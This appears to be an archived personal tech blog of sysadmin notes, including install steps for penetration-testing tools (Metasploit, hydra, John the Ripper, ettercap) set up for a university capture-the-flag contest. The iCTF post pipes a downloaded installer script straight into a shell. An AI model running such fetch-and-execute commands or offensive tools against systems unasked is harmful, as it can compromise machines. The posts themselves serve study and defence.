I rebuilt the old HP nx6120 to run Ubuntu 10.04 LTS. Again noticed that I wasn't getting reasonable runtime, instead of the usual 8-10 hrs, I only got around 3-4hrs. A discussion with a colleague led me to Linux Laptop Tools. Again some "Googling" led to the Ubuntu power management[3] which seemed to increase the runtime.

References

securingSCADA.info

2011-08-26T22:33:00.001+10:00

The securingSCADA.info site was launched earlier this year, it now boasts the wiki, that is slowly being populated with resource information on penetration testing, security compliance, etc.

It's targeted towards individuals and organisations from academia and industry working in relation to SCADA, smart grid and related security areas. Of course everyone is welcome to sign up and contribute as the site is driven to providing security through collaboration.

The site is located at http://www.securingscada.info

Installing joomscan on Ubuntu 10.04 LTS

2011-08-24T00:45:00.000+10:00

OWASP Joomla! Security Scanner that "detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site." However it appears to have been neglected, but is promised to be updated soon.

cd /opt
sudo apt-get install -y libtest-www-mechanize-perl
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan
cd joomscan
chmod 755 trunk/joomscan.pl
trunk/joomscan.pl update

Installing Metasploit 4.0.0 on Ubuntu 10.04 LTS

2011-08-23T19:49:00.002+10:00

Installing metasploit is quite easy. I have documented the installation instructions that I used below, however its just as simple to follow the more comprehensive instructions from the Rapid7/Metasploit site[1] (https://community.rapid7.com/docs/DOC-1296).

sudo apt-get install -y ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
sudo mkdir /opt/metasploit4
sudo bunzip framework-4.0.0.tar.bz2
sudo tar xvf framework-4.0.0.tar
sudo mv msf3 /opt/metasploit4
sudo chown -R root:root /opt/metasploit4/msf3
sudo ln -s /opt/metasploit4/msf3/msf* /usr/local/bin
cd /opt/metasploit4/msf3
sudo svn update
sudo crontab -e -u root # Enter "1 * * * * * /usr/bin/svn update /opt/metasploit4/msf3/ >> /var/log/msf3update.log 2>&1"
sudo apt-get install -y mysql-server
sudo apt-get install -y rubygems libmysqlclient-dev
sudo apt-get install -y ruby-dev
sudo gem install mysql

References:

https://community.rapid7.com/docs/DOC-1296

Ubuntu apt-get error

2011-07-09T14:46:00.000+10:00

When performing an "apt-get update" I got the following error

Reading package lists... Error!

E: Dynamic MMap ran out of room. Please increase the size of APT::Cache-Limit. Current value: 25165824. (man 5 apt.conf)

E: Error occurred while processing xxx

E: Problem with MergeList /var/lib/apt/lists/xxx

W: Unable to munmap

E: The package lists or status file could not be parsed or opened.

Am unsure why this is happening, but suspect it has something to do with the cache size allocated for the repositories. A quick Google search revealed a debian bug1 that helped.

sudo echo 'APT::Cache-Limit "125829120";' > /etc/apt/apt.conf.d/30cache

Seems to have fixed the problem, a quick sudo apt-get update and sudo apt-get upgrade had me happily hacking away again.

References:

https://bugs.launchpad.net/debian/+source/apt/+bug/24626

Ramblings...

2011-04-03T23:33:00.000+10:00

I cannot speak for other students, but I find feedback and constructive criticism very useful to my education and overall performance. Unfortunately I am finding the latter increasingly absent from the current academic environment, esp. when it comes to submitting official forms to QUT. It seems like a black hole at times

Oh well, “Such is life”. I seem to be quoting this a lot recently. Perhaps as a subconscious resignation to my lot in life. Just realised I have the same initials as Ned Kelly, but unfortunately his proper name was Edward Kelly, so I guess not...

Cisco 857W Router - Upgrade ADSL Firmware

2011-03-06T21:56:00.000+10:00

To upgrade the ADSL firmware you need to get the latest .bin firmware file from Cisco. You will need a CCO and a valid contract to download the file.

One you have this, copy the file to flash using a TFTP server. Then rename the file to remove the version number, then make a backup of the configuration file just in case and reboot the router. The reboot should force the new firmware to be loaded. Once rebooted verify the version of the firmware

Check the version of the firmware current running
show dsl interface ATM 0

Init FW: init_xxx-x.x.xxx.bin
Operation FW: xxx-x.x.x.bin
FW Source: xxxxxxxx
FW Version: x.x.x

Check the amount of space available on flash for the firmware, ensure that the bytes free is greater than the size of the firmware .bin file
show flash

19353600 bytes total (5369856 bytes free)

Copy the firmware .bin file to flash
copy tftp://xxx.xxx.xxx.xxx/adsl_alc_20190.x.x.x.bin

Rename the file on flash to adsl_alc_20190.bin
rename flash:adsl_alc_20190.x.x.x.bin adsl_alc_20190.bin

Reboot the router
reload

kush.id.au

2011-02-11T14:09:00.000+10:00

Got the kush.id.au domain and parked it over the kush.com.fj domain. So all subdomains and e-mail addresses should resolve for the id.au domain.Need to make some changes to the website to allow for this. Also need to upload some new Python scripts that I wrote.

iCTF - UCSB International Capture The Flag

2010-12-03T23:41:00.000+10:00

I was fortunate enough to be invited to join the QUT iCTF team. The objective of the contest is to ensure that a set of required services remain available and un-compromised. In preparation for this task, I decided to setup a dedicated laptop for the contest. I would have been far easier to install a distribution such as BackTrack, but I decided to take the painful path.

First, a friend sold me his old laptop, which was far better than my current notebook. It was a Sony VAIO SZ34GP. I installed CentOS 5.5 on this notebook, just a base install with development libraries and tools. The instructions below provide a brief list of tools and their associated configurations.

Repositories
There's a need to set-up some additional repositories for CentOS to enable the installation of additional thir party applications. For more information refer to References 3Section.

sudo bash
cd /etc/yum.repos.d/
wget -q -O - http://www.atomicorp.com/installers/atomic |sh
wget http://dries.eu/pub/dries-el.repo
wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.1-1.el5.rf.i386.rpm
rpm -ivh rpmforge-release-0.5.1-1.el5.rf.i386.rpm
yum update

Installation

Install tools to be used for the competition. Most of the tools are penetration testing tools I have used in the past. I made a point of installing the development libraries and tools during the CentOS installation. This would be useful for developing and testing possible exploits.

sudo yum -y install nmap
sudo yum -y install amap
sudo yum -y install hydra
sudo yum -y install aide
sudo yum -y install snort
sudo yum -y install nikto
sudo yum -y install ntop
sudo yum -y install fail2ban
sudo yum -y install tcptrack
sudo yum -y install dsniff
sudo yum -y install ngrep
sudo yum -y install fragroute
sudo yum -y install hping
sudo yum -y install scapy
sudo yum -y install tcptraceroute
sudo yum -y install firewalk
sudo yum -y install iptraf
sudo yum -y install kismet
sudo yum -y install ettercap

ChaosReader

Download latest version from source forge (http://chaosreader.sourceforge.net)
sudo mkdir -p /opt/chaosreader
sudo cp chaoreader0.94 /opt/chaosreader/
sudo chmod 755 /opt/chaosreader/chaoreader0.94
sudo ln -s /opt/chaosreader/chaoreader0.94 /usr/local/bin/

John the Ripper

wget http://www.openwall.com/john/g/john-1.7.6.tar.gz
tar zxvf john-1.7.6.tar.gz
cd john-1.7.6
cd src
make
clean linux-x86-any
sudo mv ../run /opt/john-1.7.6
sudo chown -R root:root opt/john-1.7.6
mv /opt/john-1.7.6/john.conf /opt/john-1.7.6/john.ini
sudo ln -s /opt/john-1.7.6/john /usr/local/sbin/
sudo ln -s /opt/john-1.7.6/john.ini /usr/local/sbin/

OpenVAS

sudo yum -y install openvas-server openvas-client openvas-scanner
sudo openvas-mkcert
sudo /usr/sbin/openvas-nvt-syn # Add as a cron job - refer to OpenVAS documentation
sudo /etc/rc.d/init.d/openvas-scanner restart
sudo /usr/sbin/openvas-adduser # Add rules "default accept" if unsure

Skipfish

wget http://skipfish.googlecode.com/files/skipfish-1.81b.tgz
tar zxvf skipfish-1.81b.tgz
sudo mv skipfish-1.81b /opt/
sudo ln -s /opt/skipfish-1.81b/skipfish /usr/local/sbin/
sudo ln -s /opt/skipfish-1.81b/sfscandiff /usr/local/sbin/
sudo chown -R root:root /opt/skipfish-1.81b

VMWare Server

Download the latest VMWare Server, at the time of this blog it was version 2.0.2
tar zxvf VMware-server-2.0.2-203138.i386.tar.gz
cd vmware-server-distrib
sudo ./vmware-install.pl

References:

Installing Metasploit Framework on Ubuntu

2010-11-23T09:16:00.000+10:00

Recently, I had to install Metasploit Framework on Ubuntu. I thought I would document the instructions here. Be sure to check the downloads page on the Metasploit website (http://www.metasploit.com) to get the current version. At the time of this blog the latest version was 3.5.0.

wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2
bunzip2 framework-3.5.0.tar.bz2
tar xvf framework-3.5.0.tar
sudo cp -a msf3 /opt/msf3
sudo ln -sf /opt/msf3/msf* /usr/local/bin/
sudo svn update /opt/msf3/
sudo crontab -e -u root # Enter "1 * * * * /usr/bin/svn update /opt/msf3/ >> /var/log/msf3update.log 2>&1"

References:

http://www.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training

Fake ARP Daemon

2010-11-12T16:04:00.001+10:00

The Fake ARP Daemon, or FARPD, provides the implementation of a fake ARP daemon for use with HoneyD. It responds to ARP requests for IP addresses modelled using HoneyD, to a specific interface MAC address. FARPD is required to set up HoneyD networks on the test bed. However it has been initially develop for the BSD platform, as a result installation on SysV systems needs a bit of work if compileing from a source tar ball.

wget http://farpd.sourcearchive.com/downloads/0.2-10/farpd 0.2.orig.tar.gz
wget http://farpd.sourcearchive.com/downloads/0.2-10/farpd 0.2-10.diff.gz
tar zxvf farpd 0.2.orig.tar.gz
gunzip farpd 0.2-10.diff.gz
cd farpd-0.2
patch -p1 ¡ ../farpd 0.2-10.diff
mkdir -p /usr/lib/bin
ln -s /usr/bin/dnet-config /usr/lib/bin/dnet-config
ln -s /usr/bin/dnet-config /usr/lib/bin/dumbnet-config
./configure –with-libdumbnet=/usr/lib –with-libevent=/usr
ln -s /usr/include/dnet.h /usr/include/dumbnet.h
make
sudo make install

Actual unpublished research project can be found at http://eprints.qut.edu.au/39098/

Chinese Cheapness... me likey vely much

2010-11-03T22:06:00.002+10:00

I finally decided to get a tablet. I already have a laptop for all my usual work requiring mobility, and have a dual screen workstation for heavy work at home. I could not justify spending a couple of hundred dollars on a gadget. Even though I would like to develop application for the Android platform, software emulators would do just as well for testing and deployment evaluation, but I got an Android tablet anyway... not one that is a high end, high quality and thus having a high price tag attached to it... I got a Chinese Cheapness... an Eken M0021 to be exact, off of eBay!

In all honesty, given the budget and the reviews, expectations were low. I was surprised when I got the box. Initially I thought I was shipped the incorrect model, as the box depicted an Eken M001 tablet and not the expected Eken M002. However once I opened the box, I discovered the correct unit inside. The packaging was slightly damaged, I suspected this may have happened during transit. The box contained an AC charging adapter, a small manual, which was promptly discarded back into the box, a small stylus and a 30 pin USB cable similar to the standard iPhone or iPod cable.

I pressed the power button, checked out settings, etc. to make sure the unit was working properly. Left the seller my feedback on eBay. I knew that the Android Market application was not installed. Fortunately I was prepared, and had downloaded the latest firmware previously2. Since the unit did not arrive with any SD card, I used an old 2GB card I had lying about. I flashed the firmware as per the instructions on the slatedroid.com site without any issues.

Screen
The unit is features a nice durable aluminium body. This gives it a nice feel. The 7" resistive touch screen provides 800x480 16:9 display and input. Since it's a resistive screen, this means no multi-touch. The bootup process seems to take ~~a good minute or two~~ one minute and thirty seconds. Probably because of the low 128MB RAM running at 800 Mhz and light weight VIA MW8505 CPU running at 533Mhz. The touch screen itself appeared very poor. It seems to be more sensitive in one corner and less on the other corner.

A close examination revealed that there is a slight ripples/buldge across the screen, as though a large screen was forced into a small case, instead of being completely smooth. The unit appeared to perform better to a human touch rather than prompting and provocation by the mechanical stylus.

Capacity
The internal storage is only appears to be only 1GB. As previously mentioned I am running the unit with a 2GB SD card, the product website seems to claim it can support up to 32GB. So will update the blog when I run out of space on the current card, which seems unlikely.

Battery
Since I'd already read the reviews, I wasn't expecting much in terms of runtime. Unlike the iPad which delivered between 10hrs to 12hrs runtime, the M002 would give you between 1hr to 2hrs depending on what you were running.

Ports
On the base of the unit you have several ports, one for the SD card, the 30pin USB port, 3.5mm head phone jack, the power adapter port and a small pin hole labelled MR, which I assumed meant master reset. Without hesitation a conveniently located paper clip was straightened and inserted, and the unit reset. Also the USB port seems to fit upside-down.

Networking
I've seen picture of adapter that plug into the 30pin USB port and provide an RJ45 connection. However the unit natively supports 802.11B and 802.11G, capable of working with WPA2. This is very simple to set up and worked without issues.

Camera
I didn't even bother checking the resolution. The image appears to be so low resolution it reminded me of the camera on my old Nokia 2760 phone. This is exactly what I had expected for the dollars spent. If you want HD just get an iPad.

Android Market
The main reason for the firmware upgrade was to get access to the Android Market. Since its a toy, all the useful applications were installed, i.e. Facebook, Dolphin Browser, anti virus (not sure why), WeatherBug, Blogaway, Touiteur, Kindle, RealCalc, eBay, Dropbox, mAnalytics, Speed Test, ConnectBot and Wifi Analyser, Ping, Pinger, AndroidVNC, Remote RDP Lite, SecurityInfo.com Net Audit.

Performance

The resolution of the YouTube video play back does not seem the best, but gets the job done.
~~The Home screen keeps crashing so I get "Sorry! Activity Home (in process android.process.acore) is not responding", this is annoying to say the least.~~ I installed Home++, things are much better now
Using the USB port does not appear to charge the unit, so I need to have the AC plugged in to charge.
The orientation changing from landscape to portrait and visa-versa is not very response at time, am not sure if this a software issue with Android or hardware issue with the accelerometer.
The Skype client does not support Skype over the Wifi link, so cannot make voice calls using Skype.

Issues

The battery runtime leaves a lot to be desired, but I knew this before I got the unit. Issues, the unit does tend to overheat to the extent that it's not comfortable holding it in the palm of your hand for prolonged periods of time. This overheating issue is the only one that I was not aware off. The bottom line is that I was prepared for, and knew what I was getting. For anyone considering a tablet for regular use for anything other than recreation, this unit is not for you, and you should probably wait for Google gPad.

When I have some more time, I will try to see if there is a better custom firmware and run that to see if it makes a difference.

References

Mildly Amusing

2010-10-24T01:29:00.001+10:00

It's only mildly amusing but perhaps more of a disappointment what people are passing off as blogs these days.

Sure everyone has a right to their opinions and an equal right to express them on blogs, but the pretentious content expressed on some blogs is simply misleading and in my opinion an abuse of trust.

Blog readers vest a certain level of trust in bloggers to accurately represent their perception of the common truth. It's simply unbecoming when bloggers make up facts just to support their opinions and claims.

There should definitely some form of blog peer review to rank blogs for their content. Possible criteria proposed could be Factual, Opinion, Technical, etc. or TA for bloggers talking out of their bottoms.

So until some form of peer review, approval and/or ranking is implemented please file this one under Opinion or TA, whichever takes your fancy...

- Posted using BlogPress from my iPhone 3GS

MSOHTMED.EXE and MSOXMLED.EXE

2010-10-09T14:51:00.000+10:00

When attempting to edit a HTML document, the Microsoft XML editor may be used. However occasionally this may not function correctly and result in high CPU usage by the MSOHTMED.EXE and MSOXMLED.EXE processes. Using Windows TaskManager to kill the processes may not work also.

To correct this change the HTML document editor specified in Internet Options.
Control Panel - Internet Option - Programs tab - HTML editor field

Reverting back to the original setting also work, but I prefer using Vim for Windows to edit my HTML documents anyway :)

"Spellling" in gVim

2010-10-06T00:53:00.001+10:00

To enable spell check in gvim
:set spell spelllang=en_au

To correct highlighted word
z=

To disable spell check
:set nospell

if (Indians || Endians) {...

2010-09-12T00:33:00.000+10:00

As part of my research project have been working on some network code in C++. Ran into a couple of issues, which were tracked down to incorrect endian orientation, i.e. big-endian vs. little-endian. While testing a couple of theories, came up with a demo app which may be useful to someone.

#include 
#include 

#include  // printf
#include  // atoi

using std::cout;
using std::endl;
using std::string;

/**
 * Declare an integer and check if the high order byte is used or not
 * If the high order byte is used then it's little endian based machine
 * else its using big endian. The function isBigEndian is
 * define as a macro for inline substitution at compile time.
 */
const int ENDIAN = 1;
#define isBigEndian() ((*(char*)&ENDIAN) == 0)

// function prototypes
int reverseInt( int );
void usage();
/** 
 * main entry point into the endian demo application. The application accepts
 * an integer from the command-line arguments and displays it as an int, as a 
 * hex value and then finally the raw bytes. If the machine is a little-endian
 * based processor then details of the int is also displayed.
 *
 * @param argc - int specifying the number of command line 
 *               arguments
 * @param argv - char ** containing the actual command line 
 *               arguments
 * @return int - 0 on success, else non-zero value
 */
int main( int argc, char **argv ) {
  // check command line arguments
  if ( argc != 2 ) {
    usage();
    return -1;
  }

  // parse and process command line arguments
  int x = atoi( argv[1] );                  // get the int
  unsigned char *ptr = (unsigned char *)&x; // byte array pointer to int

  int y = 0;                                // variable to hold the reverse int

  // display the int size
  cout << "sizeof(int) = " << sizeof(int) << endl << endl;

  // display info on the int
  printf("dec: %d\n", x);
  printf("hex: 0x%x\n", x);
  printf("bytes: ");
  for (int i=0; i < sizeof(int); i++) {
    printf("0x%x ", ptr[i] ); // using cout is too anoying for formatting!!
  }
  cout << endl;
  string str(( const char * ) ptr );
  cout << "str: " << str << endl;

  // determine endian orientation of machine
  if ( isBigEndian() ) {
    cout << "Big Endian Machine!!!" << endl;
  } else {
    cout << "Little Endian Machine!!!" << endl;
    y = reverseInt(x); // reverse the int

    printf("dec: %d\n", y);
    printf("hex: 0x%x\n", y);
    printf("bytes: ");
    ptr = (unsigned char *)&y;
    for (int i=0; i < sizeof(int); i++) {
      printf("0x%x ", ptr[i] ); // using cout is too anoying for formatting!!
    }
    cout << endl;
    str = (const char *)ptr;
    cout << "str: " << str << endl;
  }

  return 0;
}

/**
 * Should only be called on little endian processers. Reverses the int byte 
 * order for little endian machines.
 *
 * @param iNum - int to reverse
 * @param int - the reversed int
 */
int reverseInt( int iNum ) {

  unsigned char *rev = new unsigned char[sizeof(int)];
  for ( int i = 0; i < sizeof(int); i++ ) {
    rev[i] = (iNum >> (8*i)) & 255;
  }

  int ret = 0;
  for ( int i = 0; i < sizeof(int); i++ ) {
    ret += (int)rev[i] << ((sizeof(int) - (i+1)) * 8);
  }

  return ret;
}

/**
 * usage displays the demo program usage information. The usage
 * information is output to stdout.
 */
void usage() {
  cout << "Usage: endian INT" << endl;
  cout << "Endian demo application to check and manipulate int for endian use";
  cout << endl << endl;
  cout << "  INT\t- int value";
  cout << endl << endl;

cout << "Example:" << endl;
cout << " endian 65535" << endl;
}

Google yourself - Self-googling as a tool for privacy protection

2010-09-01T18:12:00.001+10:00

Due to the growth of recent social networking web application such as Facebook, Twitter, etc. its not un-common to unknowingly disclose personal details into the public domain. The use of seach engines such as Google is a popular way to find out if you have increased the potential vulnerability of identity theft.

Whilst "self‐googling, can be the theory of narcissism,"2 its also a good way to investigate personal, and related information about oneself. The consequences of having an unwanted Internet presence can be quite serious, not only from an information security perspective, but also from a social one. Once you have identified the appropriate information you need to remove them, this is the hard part. Google Webmaster tools provide several guidelines for this.

Digital presence create cyber footprint which are not always so easy to get rid off, and can follow the unsuspecting cyber citizen home!!! So perhaps Googling yourself every once in a while is a healthy thing and no so bad after all.

References:

Failed to install "Security Update for .NET Framework 2.0 SP2 and 3.5 SP1 on Windows Server 2003 and Windows XP x86 (KB983583)"

2010-08-19T12:24:00.002+10:00

Windows Update kept failing indicating it Failed to install "Security Update for .NET Framework 2.0 SP2 and 3.5 SP1 on Windows Server 2003 and Windows XP x86 (KB983583)"

After some Googling, and manually downloading and running the update, I managed to get the actual error message 1603 from the manual installer. Later I discovered that the generic error "1603" implies a "Fatal error during installation.".

The Microsoft KB seems to indicate that "These errors codes are usually caused by a corruption in the .NET Framework installation or by an inconsistency on the MSI database state.". In an attempt to resolve the issue as per the KB, I attempted to manually uninstall the .net framework, but this too failed.

I then downloaded the un-installer (Refer 3 below) and forced the uninstall. Installed the latest .net framework and updated. I had to reboot the machine after the first lot of updates, and attempted Windows Update again after the reboot. Uninstalling and re-installing the .net framework appears to have resolved the issue.

References:

http://www.microsoft.com/downloads/details.aspx?FamilyID=1e53f250-2d4b-4f61-86ee-9f9f3a9c0b48&displaylang=en
http://support.microsoft.com/kb/923100/
http://cid-27e6a35d1a492af7.skydrive.live.com/self.aspx/Blog_Tools/dotnetfx_cleanup_tool.zip

Australian Game Shops Online

2010-08-08T14:43:00.001+10:00

Thought I'd share a list of game shop websites that I found using Google. It also saves me searching for it again.

http://www.alternateworlds.com.au/
http://www.gamesparadise.com.au/
http://www.goodgames.com.au/
http://www.milsims.com.au/catalog/
http://www.mindgamesmelbourne.com/
http://www.minotaur.com.au/
http://www.tactics.net.au/
http://www.tinsoldier.com/

Yum via a proxy

2010-07-27T19:18:00.000+10:00

In case you need to force yum on a Redhat or CentOS system via proxy and authenticate, the quickest way I found was to set the following environment variable, i.e. export from .bash_profile or the likes;
export http_proxy=http://username:password@proxy_server:proxy_port

Cisco 827 Router - Unable to initialize flash device at FFE80000 -- device not found.

2010-06-16T17:13:00.003+10:00

It seems that, if the ROMMON software is upgraded, then the older IOS causes the detection of the Flash memory to fail resulting in the error "Unable to initialize flash device at FFE80000 -- device not found." upon bootup.

After Googling, several site's (e.g. http://www.velocityreviews.com/forums/t30077-cisco-827-flash-memory-and-ios.html) list the upgrade of the IOS as the solution. In hind-sight, to avoid this it may be a good idea to first upgrade the IOS to the latest version before attempting to upgrade the ROMMON.

System Bootstrap, Version ~~xx.x(xx)xxx~~, RELEASE SOFTWARE (fc1)
Copyright (c) 2000 by cisco Systems, Inc.
C827 platform with 32768 Kbytes of main memory

Unable to initialize flash device at FFE80000 -- device not found.
CISCO C827 (MPC855T) processor (revision 0x801) with 31744K/1024K bytes of memory.
Processor board ID JAD06430E2L (2370919839), with hardware revision FD3C
CPU rev number 5
Bridging software.
1 Ethernet/IEEE 802.3 interface(s)
1 ATM network interface(s)
128K bytes of non-volatile configuration memory.

Router>sh ver

Cisco Internetwork Operating System Software
IOS (tm) C827-4V Software (C827V- ~~xx-x~~), Version ~~xx.x(x)xx~~, EARLY DEPLOYMENT RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2000 by cisco Systems, Inc.
Compiled Mon 10-Apr-00 13:45 by phanguye
Image text-base: 0x80013170, data-base: 0x8067D780

ROM: System Bootstrap, Version ~~xx.x(xx)xxx~~, RELEASE SOFTWARE (fc1)

Router#show file systems
File Systems:

   Size(b) Free(b) Type Flags Prefixes
   131072 130366 nvram rw nvram:
   - - opaque rw null:
   - - opaque rw system:
   - - unknown wo rommon:
   - - network rw tftp:
   - - opaque ro xmodem:
   - - opaque ro ymodem:
   - - network rw rcp:
   - - network rw ftp:

To resolve the issue a newer version of the IOS needs to be installed on the router. This becomes as issue as the "flash:" is not detected. The IOS needs to be installed over the serial interface using the XMODEM commands. Boot to the ROMMON prompt, i.e. reload the router and hit the break sequence.

Depending on the size of the image, this may take a while. Also depening on the router, the ROMMON version, you may be able to configure the xmodem speeds, etc. I used Windows Hyperterminal (hypertrm) for this. Once it's done, set the confreg back (0x2102), if you changed it, and reset the router. Should all be good now.

References:

Scapy on Ubuntu

2010-05-15T13:36:00.001+10:00

I won't introduce Scapy as there are lots of overview, introductions, tutorials and guides available on Scapy, so just Google for it. I though I'd blog about my install on Ubuntu just in case I need to come back to it at some stage and cannot recall exactly what and how I installed;

sudo apt-get update
sudo apt-get install tcpdump
sudo apt-get install python
sudo apt-get install python-scapy
sudo apt-get install graphviz
sudo apt-get install imagemagick
sudo apt-get install python-gnuplot
sudo apt-get install python-crypto
sudo apt-get install python-pyx

I may be putting up some scapy script on my webpage in the near future in case anyone is interested. I used scapy for Digital Forensics

Toshiba Recovery Wizard

2010-04-13T00:08:00.001+10:00

In case you ever need to perform a recovery on a Toshiba, (obviously after the necessary backups, ensure running on mains power, etc)

Turn off laptop.
Press and hold "0" (zero) key.
Power on laptop.
Once the Toshiba splash screen appears, release the "0" (zero) key.
Follow the Toshiba Recovery Wizard prompts.

Urbanspoon - Curryville

2010-03-19T20:39:00.002+10:00

Took a chance on Urbanspoon and headed to Cilliville for some curry as it was Friday "arvo" and Deb and I were both tired. Read some initial reviews and were a bit cautious.

The Vege Samosas were very authentic. Home made pastery and the fillings were just like right. I got the special "Indian Hot" Vege curry and they weren't kidding around. I had that with rice and then stole some garlic naan from Deb.

They did not over do the decorations either. It has just the right amount of clutter in the right places. Background music was not deafening, but the traffic noise was pissing me off a bit. Overall it was a good feed.

- Posted using BlogPress from my iPhone 3GS

Website Changes

2010-03-07T00:00:00.001+10:00

Minor website changes to www.kush.com.fj. Replaced original splash image with new one made using new Hindi script. Also created splash image for Resume page using previous and current business cards. Let me know what you think as well as any more ideas or recommendations for improvements...

Ubuntu 9.10 does not boot up after hibernate!!!

2010-03-01T21:09:00.001+10:00

I've been running Ubuntu 9.10 desktp on my HP nx6120 notebook with some success for a little while now. It performs well for my TeX work, occasional web-browsing, VPN, RDP and e-mails. The GUI is enhanced using Mac4Lin. I loved the hibernate feature until late this afternoon when it refused to bootup after hibernating. I would get the splash screen and then nothing... curses!!!.

I managed to find a work-around but am still not sure what the problem was:

Boot up the machine with a rescue CDROM
Confirm the root partition for the Ubuntu install (in my case it was /dev/sda8, although I only have IDE drives)
Boot up the machine and wait for the GRUB prompt
Press "e" to edit the entry
Replace the "root=UUID..." with "root=/dev/..." on the "linux" line entry
Add the entry "no_console_suspend" on the same line
Press the "Tab" key to complete the Emacs edit
Press "Ctrl+x" to continue booting

Once the machine has bootup as normal, edit the GRUB configuration

sudo vi /etc/default/grub

Edit the file to uncomment GRUB_DISABLE_LINUX_UUID
Edit the file to add no_console_suspend in the GRUB_CMDLINE_LINUX
Save the file and exit

sudo /usr/sbin/update-grub

References

Snort sniff honk !

2010-02-28T15:59:00.001+10:00

Snort is an open source intrusion detection system (IDS). Its highly configurable and can be run in a number of modes and architectures, There are a small number of freely available rules to use. For more information refer to the Snort home page http://www.snort.org/. Here are some instructions on getting it setup on CentOS, these were adapted from the Snort Documentation by Patrick Harper at http://assets.sourcefire.com/snort/setupguides/Snort_Base_Minimal.pdf;

yum install mysql mysql-bench mysql-server mysql-devel mysqlclient10 php-mysql httpd gcc pcre-devel php-gd gd mod_ssl glib2-devel gcc-c++ php php-pear libpcap-devel
vi /etc/httpd/conf/httpd.conf #Edit the httpd.conf file to suit
/etc/rc.d/init.d/httpd start
/etc/rc.d/init.d/mysqld restart
/usr/bin/mysql_secure_installation
cd /root
mkdir snortinstall
cd snortinstall
wget http://dl.snort.org/snort-current/snort-2.8.5.3.tar.gz
tar zxvf snort-2.8.5.3.tar.gz
cd snort-2.8.5.3
./configure --with-mysql --enable-dynamicplugin # Fingers crossed it all goes well
make
make install
/usr/sbin/groupadd snort
/usr/sbin/useradd -g snort snort -s /sbin/nologin
mkdir -p /etc/snort/rules
mkdir -p /var/log/snort
cd /root/snortinstall/snort-2.8.5.3/etc
cp ./* /etc/snort/
cd /root/snortinstall
wget http://www.emergingthreats.net/rules/emerging.rules.tar.gz
tar zxvf emerging.rules.tar.gz
cd rules
cp ./* /etc/snort/rules/
vi /etc/snort/snort.conf # Edit the snort.conf file to suit
/etc/rc.d/init.d/mysqld start
mysql -u root -p mysql # Create the snort database and snort database user and set permissions
cd /root/snortinstall/snort-2.8.5.3/schemas
mysql -u snort -p snort < create_mysql
pear install -a Image_Graph-alpha Image_Canvas-alpha Image_Color Numbers_Roman
cd /root/snortinstall/
wget http://downloads.sourceforge.net/project/adodb/adodb-php5-only/adodb-510-for-php5/adodb510.tgz?use_mirror=transact
wget http://downloads.sourceforge.net/project/secureideas/BASE/base-1.4.4/base-1.4.4.tar.gz?use_mirror=transact
cd /var/www
tar zxvf /root/snortinstall/adodb510.tgz
mv adodb5/ adbodb
cd /var/www/html/
tar zxvf /root/snortinstall/base-1.4.4.tar.gz
mv base-1.4.4/ base
cd base
cp base_conf.php.dist base_conf.php
vi base_conf.php # Edit the file to suit
# Load http://SERVERNAME/base in a browser and click on the setup link
# Click on Create BASE AG button
# Click on the Main Page link

SQL

create database snort;
create user 'snort'@'localhost' identified by '';
grant create, insert, select, delete, update on snort.* to snort@localhost;
grant create, insert, select, delete, update on snort.* to snort;

Timing is everything...

2010-02-21T11:55:00.001+10:00

Having the correct clock timestamp is very important for logging, maintenance, troubleshooting and even forensic analysis. Timing provides a very important frame of reference for network devices, such as hosts, routers and switches. It would be almost impossible to construct a reliable model of an environment without having a standard and accurate frame of reference, thus timing is everything...

The Hardening Cisco Routers book provides a good reference for Network Time Protocol (NTP) important, and can be found at http://oreilly.com/catalog/hardcisco/chapter/ch10.html. NTP is a very popular way to synchornise system clocks with a central trusted server. Here's a rough guide to getting NTP running on a Linux server;

sudo yum install ntp # Install the NTP client
sudo vi /etc/ntp.conf # Edit the configuration file to use the nearest server pool. Refer to www.ntp.org to get the pools.
sudo mv /etc/localtime /etc/localtime~ # Backup the locatime file
sudo ln -s /usr/share/zoneinfo// /etc/localtime # Ensure that the correct locatime file is set for your city
sudo ntpdate # Set the date using NTP using the pool specified*
sudo /etc/rc.d/init.d/ntp start # Start the NTP client daemon
ntpstat # Check that the system clock is synchronised
date # Check that the system date is set correctly
sudo hwclock -w # Set the hardware clock to the system date

*Note: Ensure that the host allows traffic on port 123 for the NTP protocol to work.

Linux Jump Box VPN

2010-02-20T23:03:00.001+10:00

With the Linux Desktop out of the way, and my impending studies in Network Security coming up, I thought I'd preempt the studies with some initial ground work on my old Linux Server. Previously we had an old server at home, that was used mostly as a web proxy (Squid) and Windows (Samba) server to share files and the home printer.

Well, it was time for a change and I decided to rebuilt it into a bastion jump box, with a restructure of the home network as well. I started off by installing a second Network Interface Card (NIC) on it. Then installed a bare CentOS on it. I did a yum update on it to ensure the latest patches and stable packages we installed. Next went through the services and disabled all the unnecessary stuff.

The idea is to separate the internal network from the De-militarized Zone (DMZ). The purpose of the jump box is to sit on the DMZ between the access and choke routers. The jump box will provide Virtual Private Network (VPN) access into the network, as well as providing proxy services such as web proxy, syslog, ssh and other services.

In the network, both the access and choke router perform Network Address Translation (NAT), Quality of Serverice (QoS), as well as stateful packet inspection (SPI) firewall functions. In addition to SPI, the choke also performs some port forwards to the jump box and the sip phone. All other traffic is dropped.

So to get home from university, I need to VPN in, then use SCP to transfer my files (assignments, reports, etc) and get out again.

To install OpenVPN, perform the following tasks;

sudo wget http://centos.karan.org/kbsingh-CentOS-Extras.repo
sudo yum --enablerepo=kbs-CentOS-Testing install openvpn
sudo find / -name "easy-rsa" # returns something like "/usr/share/openvpn/easy-rsa/"
sudo cp -R /usr/share/openvpn/easy-rsa /etc/openvpn/
sudo cd /etc/openvpn/easy-rsa/2.0/
sudo mkdir keys
sudo vi ./vars
Change the following variables

export KEY_SIZE=2048
export KEY_COUNTRY=""
export KEY_PROVINCE=""
export KEY_CITY=""
export KEY_ORG=""
export KEY_EMAIL=""

sudo bash
source ./vars
./clean-all
./build-ca
